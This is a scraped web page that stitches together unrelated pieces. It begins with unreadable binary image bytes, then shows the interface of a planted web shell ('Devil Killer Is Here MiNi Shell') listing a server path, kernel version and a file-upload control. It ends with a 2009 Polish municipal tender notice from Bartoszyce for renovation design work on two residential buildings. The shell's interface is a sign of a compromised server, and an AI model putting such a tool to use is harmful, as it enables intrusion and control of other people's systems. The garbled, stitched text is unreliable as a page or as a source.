JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162747-N-2009.html

<p class="kh_header"><b>Bartoszyce: Projekt remontu budynków mieszkalnych przy ul. Okrzei 4 i Robotniczej 4 
 w Bartoszycach</b><br>
<b>Numer ogłoszenia: 162747 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta , ul. Bohaterów Monte Cassino 1, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 089 7629804, 7629819, faks 089 762 9805.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bartoszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt remontu budynków mieszkalnych przy ul. Okrzei 4 i Robotniczej 4 
 w Bartoszycach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Opis przedmiotu zamówienia: 
1.	Zadanie I
	opracowania dokumentacji projektowej na remont budynku mieszkalnego 	przy ul. Robotniczej 4 w Bartoszycach, 
2.	Zadanie II
	Opracowania dokumentacji projektowej na remont budynku mieszkalnego przy 	ul. Okrzei 	4 w Bartoszycach.

3. Wytyczne  do opracowania dokumentacji projektowej na remont budynku mieszkalnego przy ul. Robotniczej 4.
Opis stanu istniejącego.
Budynek usytuowany w śródmiejskiej części miasta Bartoszyce przy ul. Robotniczej 4 stanowiącej element średniowiecznego układu urbanistycznego zaliczonego do rejestru zabytków nieruchomości m. Bartoszyce na mocy decyzji Wojewódzkiego Konserwatora Zabytków w Olsztynie nr A-I z dnia 5 lutego 1954 r.Budynek zbudowany w 1900 r. usytuowany jest w strefie bezpośredniej ochrony konserwatorskiej lecz jako obiekt nie został objęty imiennym spisem zabytków nieruchomych.Budynek mieszkalny II rodzinny, podpiwniczony, murowany dach dwuspadowy o konstrukcji płatwiowo kleszczowej kryty dachówką ceramiczną, stropy na belkach stalowych typu kleina, klatka schodowa drewniana, ogrzewanie lokali zasilane z kotłowni zlokalizowanej w pomieszczeniu piwnicy na paliwo gazowe

Dane techniczne :	
I. Rok budowy :	- 1900
2. Rok remontu gruntownego	- 1979
3. Kubatura	- 2288,00 m3
4. Powierzchnia zabudowy :	- 217,60 m2
5. Powierzchnia mieszkalno-użytkowcy budynku ogólem	- 466,22 m2
w tym	pow. lokali mieszkalnych	- 379,42 m2
pow. piwnic lokatorskich	- 86,80 m2
pow. wspólnego użytkowania	- 111,07 m2
Konstrukcja i wyposażenie techniczne.
Układ konstrukcyjny mieszany. Fundamenty i ściany zewnętrzne piwnic kamienne. Ściany wewnętrzne murowane z cegły ceramicznej pełnej o wyraźnie zróżnicowanej grubości. Ścianki działowe murowane z cegły ceramicznej pełnej i w części poddasza o konstrukcji drewnianej. Strop nad parterem i I piętrem ceramiczny typ kleina na belkach stalowych dwuteowych z kotwami utwierdzonymi w ścianach zewnętrznych. Nad pomieszczeniami mieszkalnymi poddasza strop drewniany belkowy zmontowany na istniejącym układzie kleszczowym drewnianej więźby dachowej.
Dach wysoki dwuspadowy o drewnianej płatwiowo-kleszczowej konstrukcji odeskowany i pokryty dachówką ceramiczną holenderką z niezbędnymi obróbkami blacharskimi.
Stolarka okienna o zróżnicowanych typach wykonania (zespolona jednoskrzydłowa, zespolona jednoskrzydłowa z wywietrznikiem, skrzynkowa jednorzędowa dwudzielna).
Drzwi wejściowe do lokali pełne typowe, drzwi wewnętrzne w lokalach mieszkalnych płytowe i częściowo przeszklone.
Podłogi drewniane w lokalach mieszkalnych i I.I. schodowej, parter, I piętro poddasze w sanitariatach wspólnego użytkowania i piwnicy posadzki cementowe.
Należy opracować inwentaryzację architektoniczno-konstrukcyjną z orzeczeniem stanu technicznego poszczególnych elementów konstrukcji budynku, projekt budowlany remontu budynku mieszkalnego przy ul. Robotniczej 4 w Bartoszycach, przedmiar robót z wyceną planowanych nakładów należy sporządzić w podziale na elementy robót wyszczególnione jak niżej.

Zakresem prac remontowych: 
I Element robót - Remont dachu.
1.	Przebudowa kominów ponad dachem z uzupełnieniem tynków na kominach w części strychowej.
2.	Rozebranie istniejącego pokrycia z dachówki.
3.	Zerwanie łat
4.	Częściowa wymiana deskowania / w zależności od stopnia zniszczenia .
5.	Częściowa wymiana zniszczonych elementów konstrukcyjnych więźby dachowej.
6.	Ułożenie foli i nabicie łat.
7.	Przebudowa kukawek z dociepleniem i wymianą pokrycia.
8.	Ułożenie nowej dachówki na całej powierzchni dachu.
9.	Wymiana obróbek blacharskich w całości.
10.	Wyprowadzenie nowych przewodów wentylacyjnych ponad dach.
11.	Wymiana instalacji odgromowej


II Element robót - Termomodernizacja budynku.
1.	Docieplenie ścian budynku płytami styropianowymi z ułożeniem wyprawy tynkarskiej.
2.	Wymiana stolarki okiennej w całości.
3.	Wymiana drzwi wejściowych do budynku.
III Element robót - Klatka schodowa, strych, piwnica.
1.Docieplenie ścian zewnętrznych w lokalach mieszkalnych w części strychowej.
2.Docieplenie stropu nad I piętrem w części strychowej. 3.Uzupełnienie i naprawa posadzek, tynków w piwnicy.
4.	Dokonać oceny stanu technicznego instalacji elektrycznej w budynku z przystosowaniem do obowiązujących przepisów i wymogów z uwzględnieniem zainstalowania dodatkowych urządzeń elektrycznych do podgrzewania wody na potrzeby mieszkańców.
5.	Remont klatki schodowej z naprawą biegów i spoczników, uzupełnieniem tynków, malowaniem ścian i sufitów.
6.	Wykonanie instalacji RTV, domofonowej.
IV Element robót - Zmiana układu funkcjonalnego mieszkań.
1.	Wydzielić pomieszczenia łazienek w ramach istniejącej powierzchni mieszkalno użytkowej.
2.	Wykonać instalację : wod-kan z podejściami pod urządzenia sanitarne i kąpielowe.
3.	Wykonać instalację elektryczną z możliwością podłączenia podgrzewaczy wody.
4.	Wykonać wentylację grawitacyjną z pomieszczeń łazienek.
5.	Łazienki wyposażyć w miskę ustępową z baczkiem z podejściami pod urządzenia kąpielowe.

4. Wytyczne do opracowania dokumentacji projektowej na remont budynku mieszkalnego przy ul. Okrzei 4.
Opis stanu istniejącego.
Budynek mieszkalny zbudowany w 1915 r częściowo podpiwniczony, murowany, dach dwuspadowy o konstrukcji płatwiowo-kleszczowej kryty dachówką ceramiczną strop nad piwnicą ceramiczny, 

stropy nad parterem i piętrem na belkach drewnianych, klatki schodowe drewniane, ogrzewanie lokali piece kaflowe na węgiel. Węzły sanitarne wspólnego użytkowania zlokalizowane na kl. schodowych.

Dane techniczne: 

I. Powierzchna zabudowy	183,75 m2
2.	Powierzchnia użytkowa	254,90 m2
3.	Kubatura	I 222,00 m3
4.	Ilość lokali	8
5.	Ilość kondygnacji	2 
Budynek wyposażony w następujące instalacje: 
instalacja elektryczna
instalacja gazowa
instalacja wod-kan włączona do miejskiej sieci

Zakresem prac remontowych:
I. Element robót - Remont dachu.
1.	Przemurowanie kominów ponad dachem z otynkowaniem.
2.	Wymiana tynków na kominach w części strychowej.
3.	Rozebranie pokrycia z dachówki ceramicznej.
4.	Wymiana zniszczonych elementów konstrukcji więźby dachowej stwierdzonych podczas sporządzania oględzin lub prowadzonych prac remontowych.
5.	Przełożenie pokrycia dachu z dachówki ceramicznej (rozbiórkowej) z wymianą łat i ułożeniem foli dachowej z wymianą zniszczonych obróbek blacharskich.
6.	Impregnacja konstrukcji więźby dachowej.
II. Element robót - Termomodernizacja budynku.
1.	Docieplenie ścian budynku płytami styropianowymi z ułożeniem wyprawy tynkarskiej.
2.	Wymiana stolarki okiennej z profili PCV w całości.
3 Wymiana stolarki drzwiowe) zewnętrznej z profili aluminiowych (wejście do I.I. schodowej).
4.	Docieplenie stropu nad piętrem wełną mineralną z wymianą podłogi ślepej.

III. Element robót - Remont klatki schodowej i pomieszczeń piwnicznych.
1.	Dostosowanie wewnętrznych linii zasilających instalacji elektrycznej do obowiązujących przepisów i norm.
2.	Wykonanie instalacji RTV.
3.	Modernizacja wspólnych pomieszczeń wc.
4.	Remont kl. schodowej z naprawą tynków posadzek biegów schodowych, robót malarskich.
5.	Remont pomieszczeń piwnicznych z wykonaniem ścianek działowych, tynków, posadzek. 


Zakres prac objętych zleceniem:
1.	Mapa do celów projektowych -zostanie przekazana przez Zamawiającego. 
2.	Wystąpienie do dysponentów sieci o wydanie warunków technicznych na przyłączenie do sieci, zwiększenie mocy oraz usunięcie kolizji. 
3.	Opracowanie koncepcji proponowanych rozwiązań zgodnie z programem inwestorskim i uzgodnienie z Urzędem Miasta Bartoszyce.
4.	Na uzgodniony zakres rozbudowy przygotowanie i złożenie wniosku o wydanie decyzji o warunkach zabudowy oraz decyzji środowiskowej. 
5.	Uzyskanie wszelkich niezbędnych uzgodnień dokumentacji. 
6.	Przygotowanie i złożenie wniosku o wydanie decyzji pozwolenia na budowę.
7.	Wykonanie projektu budowlanego i wykonawczego na całe opracowanie. Projekt wykonawczy podzielić na zadania i elementy.

Dla każdego z etapów zadania opracować: 
a) przedmiary robót, kosztorysy ofertowe i inwestorskie. 
b) dla każdego zadania przygotować Zbiorcze Zestawienie Kosztów
c) specyfikacje techniczne na wykonany zakres robót
	Opracowania projektowe dostarczyć w 5 egz., kosztorysy i specyfikacje 	techniczne w 3 egz., całość opracowania dodatkowo w wersji elektronicznej w 	formacie PDF..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia - niespełna.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę 

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  







B.4) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
B.5) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
B.6) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych.   

C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 

C.1) Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.  

	Minimalny poziom standardu - zamawiający uzna warunek za spełniony w sytuacji gdy wykonawca wskaże dwie usługi. 

C.2) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
oraz
pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował.

	Minimalny poziom standardu - zamawiający uzna warunek za spełniony w sytuacji gdy wykonawca wskaże  trzy osobowy zespół projektowy (obejmujący trzy różne   branże) 

C.3) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.   

	





Minimalny poziom standardu - zamawiający uzna warunek za spełniony w sytuacji gdy wykonawca wskaże dokumenty potwierdzające uprawnienia do wykonywania powierzonych czynności oraz potwierdzenie przynależności do właściwej izby samorządu zawodowego.

D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

E.1) Zamiast dokumentów, o których mowa w pkt. B.1), B.3), B.5) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

E.2) Zamiast dokumentu, o którym mowa w pkt. B.4) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 85</li>
<li>2 - termin realizacji zadania - 15</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bartoszyce.bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Bartoszyce ul. Boh. Monte Cassino 1 11-200 Bartoszyce pokój 34.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 10:00, miejsce: Urząd Miasta Bartoszyce ul. Boh. Monte Cassino 1 11-200 Bartoszyce. Pokój nr 1 Biuro obsługi interesantów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.	Zadanie I
opracowania dokumentacji projektowej na remont budynku mieszkalnego 	przy ul. Robotniczej 4 w Bartoszycach,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3. Wytyczne  do opracowania dokumentacji projektowej na remont budynku mieszkalnego przy ul. Robotniczej 4.
Opis stanu istniejącego.
Budynek usytuowany w śródmiejskiej części miasta Bartoszyce przy ul. Robotniczej 4 stanowiącej element średniowiecznego układu urbanistycznego zaliczonego do rejestru zabytków nieruchomości m. Bartoszyce na mocy decyzji Wojewódzkiego Konserwatora Zabytków w Olsztynie nr A-I z dnia 5 lutego 1954 r.Budynek zbudowany w 1900 r. usytuowany jest w strefie bezpośredniej ochrony konserwatorskiej lecz jako obiekt nie został objęty imiennym spisem zabytków nieruchomych.Budynek mieszkalny II rodzinny, podpiwniczony, murowany dach dwuspadowy o konstrukcji płatwiowo kleszczowej kryty dachówką ceramiczną, stropy na belkach stalowych typu kleina, klatka schodowa drewniana, ogrzewanie lokali zasilane z kotłowni zlokalizowanej w pomieszczeniu piwnicy na paliwo gazowe
.
Dane techniczne :	
I. Rok budowy :	- 1900
2. Rok remontu gruntownego	- 1979
3. Kubatura	- 2288,00 m3
4. Powierzchnia zabudowy :	- 217,60 m2
5. Powierzchnia mieszkalno-użytkowcy budynku ogólem	- 466,22 m2
w tym	pow. lokali mieszkalnych	- 379,42 m2
pow. piwnic lokatorskich	- 86,80 m2
pow. wspólnego użytkowania	- 111,07 m2
Konstrukcja i wyposażenie techniczne.
Układ konstrukcyjny mieszany. Fundamenty i ściany zewnętrzne piwnic kamienne. Ściany wewnętrzne murowane z cegły ceramicznej pełnej o wyraźnie zróżnicowanej grubości. Ścianki działowe murowane z cegły ceramicznej pełnej i w części poddasza o konstrukcji drewnianej. Strop nad parterem i I piętrem ceramiczny typ kleina na belkach stalowych dwuteowych z kotwami utwierdzonymi w ścianach zewnętrznych. Nad pomieszczeniami mieszkalnymi poddasza strop drewniany belkowy zmontowany na istniejącym układzie kleszczowym drewnianej więźby dachowej.
Dach wysoki dwuspadowy o drewnianej płatwiowo-kleszczowej konstrukcji odeskowany i pokryty dachówką ceramiczną holenderką z niezbędnymi obróbkami blacharskimi.
Stolarka okienna o zróżnicowanych typach wykonania (zespolona jednoskrzydłowa, zespolona jednoskrzydłowa z wywietrznikiem, skrzynkowa jednorzędowa dwudzielna).
Drzwi wejściowe do lokali pełne typowe, drzwi wewnętrzne w lokalach mieszkalnych płytowe i częściowo przeszklone.
Podłogi drewniane w lokalach mieszkalnych i I.I. schodowej, parter, I piętro poddasze w sanitariatach wspólnego użytkowania i piwnicy posadzki cementowe.
Należy opracować inwentaryzację architektoniczno-konstrukcyjną z orzeczeniem stanu technicznego poszczególnych elementów konstrukcji budynku, projekt budowlany remontu budynku mieszkalnego przy ul. Robotniczej 4 w Bartoszycach, przedmiar robót z wyceną planowanych nakładów należy sporządzić w podziale na elementy robót wyszczególnione jak niżej.

Zakresem prac remontowych: 
I Element robót - Remont dachu.
1.	Przebudowa kominów ponad dachem z uzupełnieniem tynków na kominach w części strychowej.
2.	Rozebranie istniejącego pokrycia z dachówki.
3.	Zerwanie łat
4.	Częściowa wymiana deskowania  w zależności od stopnia zniszczenia .
5.	Częściowa wymiana zniszczonych elementów konstrukcyjnych więźby dachowej.
6.	Ułożenie foli i nabicie łat.
7.	Przebudowa kukawek z dociepleniem i wymianą pokrycia.
8.	Ułożenie nowej dachówki na całej powierzchni dachu.
9.	Wymiana obróbek blacharskich w całości.
10.	Wyprowadzenie nowych przewodów wentylacyjnych ponad dach.
11.	Wymiana instalacji odgromowej


II Element robót - Termomodernizacja budynku.
1.	Docieplenie ścian budynku płytami styropianowymi z ułożeniem wyprawy tynkarskiej.
2.	Wymiana stolarki okiennej w całości.
3.	Wymiana drzwi wejściowych do budynku.
III Element robót - Klatka schodowa, strych, piwnica.
1.Docieplenie ścian zewnętrznych w lokalach mieszkalnych w części strychowej.
2.Docieplenie stropu nad I piętrem w części strychowej. 3.Uzupełnienie i naprawa posadzek, tynków w piwnicy.
4.	Dokonać oceny stanu technicznego instalacji elektrycznej w budynku z przystosowaniem do obowiązujących przepisów i wymogów z uwzględnieniem zainstalowania dodatkowych urządzeń elektrycznych do podgrzewania wody na potrzeby mieszkańców.
5.	Remont klatki schodowej z naprawą biegów i spoczników, uzupełnieniem tynków, malowaniem ścian i sufitów.
6.	Wykonanie instalacji RTV, domofonowej.
IV Element robót - Zmiana układu funkcjonalnego mieszkań.
1.	Wydzielić pomieszczenia łazienek w ramach istniejącej powierzchni mieszkalno użytkowej.
2.	Wykonać instalację : wod-kan z podejściami pod urządzenia sanitarne i kąpielowe.
3.	Wykonać instalację elektryczną z możliwością podłączenia podgrzewaczy wody.
4.	Wykonać wentylację grawitacyjną z pomieszczeń łazienek.
5.	Łazienki wyposażyć w miskę ustępową z baczkiem z podejściami pod urządzenia kąpielowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji zadania - 15</li>
</ul>
